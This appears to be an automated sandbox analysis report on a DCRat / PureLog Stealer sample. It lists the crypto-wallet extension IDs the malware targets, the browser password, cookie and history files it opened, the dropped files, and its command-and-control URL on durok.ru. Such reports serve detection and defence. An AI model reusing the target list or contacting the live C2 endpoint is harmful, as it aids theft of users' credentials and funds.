                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1718398029.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"One directory"}}
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1718398029.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"One directory"}}
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Z4D3XAZ2jB.exe PID: 2004, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: services.exe PID: 2308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ZDtOzYsYYWKWEhNYzFc.exe PID: 7384, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts241
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		232
                    Masquerading                    		1
                    OS Credential Dumping                    		351
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scripting                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		2
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt31
                    Registry Run Keys / Startup Folder                    		31
                    Registry Run Keys / Startup Folder                    		251
                    Virtualization/Sandbox Evasion                    		Security Account Manager251
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		12
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials134
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581018 Sample: Z4D3XAZ2jB.exe Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 52 durok.ru 2->52 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Antivirus detection for URL or domain 2->60 62 14 other signatures 2->62 8 Z4D3XAZ2jB.exe 8 40 2->8         started        12 services.exe 14 49 2->12         started        15 ZDtOzYsYYWKWEhNYzFc.exe 2->15         started        17 13 other processes 2->17 signatures3 process4 dnsIp5 36 C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe, MS-DOS 8->36 dropped 38 C:\Windows\...\services.exe, MS-DOS 8->38 dropped 40 C:\Windows\...\ZDtOzYsYYWKWEhNYzFc.exe, MS-DOS 8->40 dropped 48 25 other malicious files 8->48 dropped 68 Creates an undocumented autostart registry key 8->68 70 Found many strings related to Crypto-Wallets (likely being stolen) 8->70 72 Creates multiple autostart registry keys 8->72 82 4 other signatures 8->82 19 schtasks.exe 8->19         started        22 cmd.exe 8->22         started        24 schtasks.exe 8->24         started        26 13 other processes 8->26 54 durok.ru 104.21.93.162, 49730, 49731, 49735 CLOUDFLARENETUS United States 12->54 42 C:\Users\user\Desktop\xbtTyUdE.log, PE32 12->42 dropped 44 C:\Users\user\Desktop\rAXMkKSS.log, PE32 12->44 dropped 46 C:\Users\user\Desktop\quZEfXkb.log, PE32 12->46 dropped 50 16 other malicious files 12->50 dropped 74 Multi AV Scanner detection for dropped file 12->74 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->76 78 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 12->78 80 Tries to harvest and steal browser information (history, passwords, etc) 12->80 file6 signatures7 process8 signatures9 64 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->64 66 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 19->66 28 conhost.exe 22->28         started        30 chcp.com 22->30         started        32 w32tm.exe 22->32         started        34 ZDtOzYsYYWKWEhNYzFc.exe 22->34         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Z4D3XAZ2jB.exe60%VirustotalBrowse
                    Z4D3XAZ2jB.exe63%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    Z4D3XAZ2jB.exe100%AviraTR/Dropper.Gen
                    Z4D3XAZ2jB.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\Desktop\fxzonGoL.log100%AviraHEUR/AGEN.1362695
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\dVPxoyeA.log100%AviraHEUR/AGEN.1300079
                    C:\Users\user\Desktop\OquQxqjY.log100%AviraHEUR/AGEN.1362695
                    C:\Users\user\Desktop\CNYkWNAB.log100%AviraTR/PSW.Agent.qngqt
                    C:\Users\user\Desktop\YALoKruW.log100%AviraHEUR/AGEN.1300079
                    C:\Users\user\Desktop\RbOZahUq.log100%AviraHEUR/AGEN.1300079
                    C:\Users\user\Desktop\KInsUcJl.log100%AviraHEUR/AGEN.1300079
                    C:\Users\user\Desktop\NPGqEfku.log100%AviraTR/PSW.Agent.qngqt
                    C:\Users\user\Desktop\MgNITBew.log100%AviraTR/Agent.jbwuj
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\UAeHorhP.log100%AviraTR/Agent.jbwuj
                    C:\Users\user\Desktop\MoHhbGed.log100%AviraTR/AVI.Agent.updqb
                    C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat100%AviraBAT/Delbat.C
                    C:\Users\user\Desktop\ZeYGhBeG.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\HtvJqEPI.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\fxzonGoL.log100%Joe Sandbox ML
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\dVPxoyeA.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\OquQxqjY.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\CNYkWNAB.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\YALoKruW.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\RbOZahUq.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\KInsUcJl.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\NPGqEfku.log100%Joe Sandbox ML
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\CFoRreZv.log100%Joe Sandbox ML
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe63%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe63%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Users\user\Desktop\ADqcsYvZ.log25%ReversingLabs
                    C:\Users\user\Desktop\CFoRreZv.log8%ReversingLabs
                    C:\Users\user\Desktop\CNYkWNAB.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\DldKqVbv.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                    C:\Users\user\Desktop\GmHIOoGs.log21%ReversingLabs
                    C:\Users\user\Desktop\HkLrMVoC.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                    C:\Users\user\Desktop\HtvJqEPI.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\KInsUcJl.log17%ReversingLabs
                    C:\Users\user\Desktop\MgNITBew.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\MoHhbGed.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\NPGqEfku.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\OquQxqjY.log17%ReversingLabs
                    C:\Users\user\Desktop\PFcqhLrW.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\RbOZahUq.log17%ReversingLabs
                    C:\Users\user\Desktop\SYphwgjk.log29%ReversingLabs
                    C:\Users\user\Desktop\UAeHorhP.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\WPgYDdje.log8%ReversingLabs
                    C:\Users\user\Desktop\YALoKruW.log4%ReversingLabs
                    C:\Users\user\Desktop\ZeYGhBeG.log21%ReversingLabs
                    C:\Users\user\Desktop\bCyXfazS.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\dVPxoyeA.log4%ReversingLabs
                    C:\Users\user\Desktop\eJTFZLay.log25%ReversingLabs
                    C:\Users\user\Desktop\fxzonGoL.log17%ReversingLabs
                    C:\Users\user\Desktop\hREwAhMk.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\hdUdukKE.log29%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\klRmPCEz.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\lyXnXruh.log29%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\oPsvdwHZ.log29%ReversingLabs
                    C:\Users\user\Desktop\qmplAoJV.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\quZEfXkb.log12%ReversingLabs
                    C:\Users\user\Desktop\rAXMkKSS.log8%ReversingLabs
                    C:\Users\user\Desktop\rMnteNPl.log8%ReversingLabs
                    C:\Users\user\Desktop\tWJuefum.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\uUlCzfJh.log8%ReversingLabs
                    C:\Users\user\Desktop\wNAllcuf.log12%ReversingLabs
                    C:\Users\user\Desktop\wySLBGmi.log21%ReversingLabs
                    C:\Users\user\Desktop\xbtTyUdE.log8%ReversingLabs
                    C:\Users\user\Desktop\yKbtGcJa.log21%ReversingLabs
                    C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe63%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\GameBarPresenceWriter\services.exe63%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe63%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.w3.0%Avira URL Cloudsafe
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpWlc5QmNt0%Avira URL Cloudsafe
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php100%Avira URL Cloudmalware
                    http://durok.ru/0%Avira URL Cloudsafe
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpQgKD0%Avira URL Cloudsafe
                    http://durok.ru0%Avira URL Cloudsafe
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php$0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    durok.ru
                    		104.21.93.162
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phptrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabservices.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                        		high
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFCegCJVAgFM.16.drfalse
                          		high
                          http://www.fontbureau.com/designersGservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                              		high
                              http://www.fontbureau.com/designers/?services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers?services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.tiro.comservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                        		high
                                        http://www.fontbureau.com/designersservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17services.exe, 00000010.00000002.2975130306.00000000133E0000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000126BA000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drfalse
                                            		high
                                            http://www.goodfont.co.krservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sajatypeworks.comservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.typography.netDservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/cTheservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.galapagosdesign.com/staff/dennis.htmservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.w3.ZDtOzYsYYWKWEhNYzFc.exe, 0000001C.00000002.1961097952.0000000003269000.00000004.00000800.00020000.00000000.sdmp, ZDtOzYsYYWKWEhNYzFc.exe, 00000020.00000002.2123369585.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, ZDtOzYsYYWKWEhNYzFc.exe, 00000022.00000002.2287240262.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, ZDtOzYsYYWKWEhNYzFc.exe, 00000028.00000002.2704171763.00000000027B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installservices.exe, 00000010.00000002.2975130306.0000000012696000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000133BB000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchservices.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                                          		high
                                                          http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpWlc5QmNtservices.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fonts.comservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.urwpp.deDPleaseservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.zhongyicts.com.cnservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZ4D3XAZ2jB.exe, 00000000.00000002.1718398029.000000000313B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.apache.org/licenses/LICENSE-2.0services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.comservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoservices.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                                                              		high
                                                                              http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php$services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                                                                		high
                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016services.exe, 00000010.00000002.2975130306.00000000133E0000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000126BA000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drfalse
                                                                                  		high
                                                                                  https://www.ecosia.org/newtab/services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                                                                    		high
